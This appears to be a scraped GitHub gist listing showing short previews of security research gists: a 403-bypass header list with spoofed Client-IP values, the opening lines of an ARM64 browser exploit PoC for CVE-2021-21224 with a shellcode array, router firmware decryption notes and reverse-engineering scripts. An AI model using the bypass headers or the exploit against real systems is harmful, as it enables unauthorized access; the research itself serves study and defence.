- In Ghidra's Project Tool, Go to Tools -> Import Tool..., select
mistyCodeBrowser.tool - Dragging file onto the new
CodeBrowser_1in ToolChest
Spix0r
/ 403-Bypass-Headers-List.txt
Created
October 3, 2024 15:24
I’ve analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I’ve compiled a list of headers you can fuzz to potentially bypass 403 restrictions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Allow: CONNECT | |
| Allow: GET | |
| Allow: HEAD | |
| Allow: POST | |
| Allow: TRACE | |
| Client-IP: 0 | |
| Client-IP: 0177.0000.0000.0001 | |
| Client-IP: 0x7F000001 | |
| Client-IP: 10.0.0.0 | |
| Client-IP: 10.0.0.1 |
wdormann
/ CVE-2021-21224.html
Last active
October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function gc() { | |
| for (var i = 0; i < 0x80000; ++i) { | |
| var a = new ArrayBuffer(); | |
| } | |
| } | |
| let shellcode = [ | |
| // Move x18 to x28 (TEB) |
nstarke
/ decrypting-dlink-proprietary-firmware-images.md
Last active
July 19, 2024 02:47
Decrypting DLINK Proprietary Firmware Images
The DIR-3040 models of DLINK routers feature encrypted firmware images in the most recent versions of the firmware. https://support.dlink.com/ProductInfo.aspx?m=DIR-3040-US details the firmware images available for this product.
1.11B02- ftp://ftp2.dlink.com/PRODUCTS/DIR-3040/REVA/DIR-3040_REVA_FIRMWARE_v1.11B02.zip1.02B03- ftp://ftp2.dlink.com/PRODUCTS/DIR-3040/REVA/DIR-3040_REVA_FIRMWARE_v1.02B03.zip
Unzipping the first reveals two files:
DIR-3040_REVA_RELEASE_NOTES_v1.11B02.pdf
rpw
/ extract_gnu_debugdata_for_ida.sh
Created
June 21, 2020 10:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # quick and dirty bash script to extract .gnu_debugdata section | |
| # from ELF binaries to generate an IDC script that adds these | |
| # names as symbols | |
| # --rpw, 2020-06-21 | |
| SYMBOLFILE=debugdata_symbols.elf | |
| if [ $# -lt 1 ]; then | |
| echo "you need to supply a path to a binary" |
nstarke
/ linksys-ea4500-device-firmware-decryption.md
Created
March 18, 2020 03:09
Linksys EA4500 Device Firmware Decryption
I recently pulled a Linksys EA4500 out of storage for evaluation. The first thing I wanted to do was to update the firmware for the device.
https://www.linksys.com/us/support-article?articleNum=148385 offers the latest version of the firmware, which is 3.1.7 as of this writing.
However, we can see with the filename that its probably encrypted: FW_EA4500V3_3.1.7.181919_prod.gpg.img
When I run binwalk I don't get any meaningful results, confirming my suspcicions:
MattPD
/ analysis.draft.md
Last active
February 22, 2026 07:22
Program Analysis Resources (WIP draft)
(draft; work in progress)
See also:
- Compilers
- Program analysis:
- Dynamic analysis - instrumentation, translation, sanitizers